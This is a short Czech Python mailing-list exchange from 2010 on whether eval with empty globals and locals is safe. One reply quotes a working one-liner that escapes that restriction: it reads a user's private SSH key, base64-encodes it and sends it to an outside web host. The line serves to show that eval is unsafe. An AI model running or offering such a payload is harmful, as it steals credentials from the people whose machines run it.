[python] parsing souboru
Hynek Fabian
hynek.fabian na firma.seznam.cz
Středa Květen 5 14:47:00 CEST 2010
To je ale krásně hnusný… odvolávám co jsem odvolal a slibuji co jsem slíbil,
evalu se budu nadále vyhýbat obloukem.
Petr Messner (středa 05 Květen 2010 14:37:20):
> eval("__import__('urllib2').urlopen('http://messa.cz/?pepovoklic='+__import
> __('base64').urlsafe_b64encode(open('/home/pepa/.ssh/id_dsa').read())).read
> ()", {}, {})
>
> 2010/5/5 Hynek Fabian <hynek.fabian na firma.seznam.cz>:
> > Jan Janech (středa 05 Květen 2010 13:08:49):
> >> Dovolim si oponovat. Vsetko co sa da v pythone v exec spravit pre
> >> narusenie bezpecnosti sa da spravit aj v eval.
> >
> > Jak?
> >
> > eval(x, {}, {})
> >
> > Jakým X se dá z takové konstrukce utéci?
> > _______________________________________________
> > Python mailing list
> > Python na py.cz
> > http://www.py.cz/mailman/listinfo/python
>
> _______________________________________________
> Python mailing list
> Python na py.cz
> http://www.py.cz/mailman/listinfo/python
Další informace o konferenci Python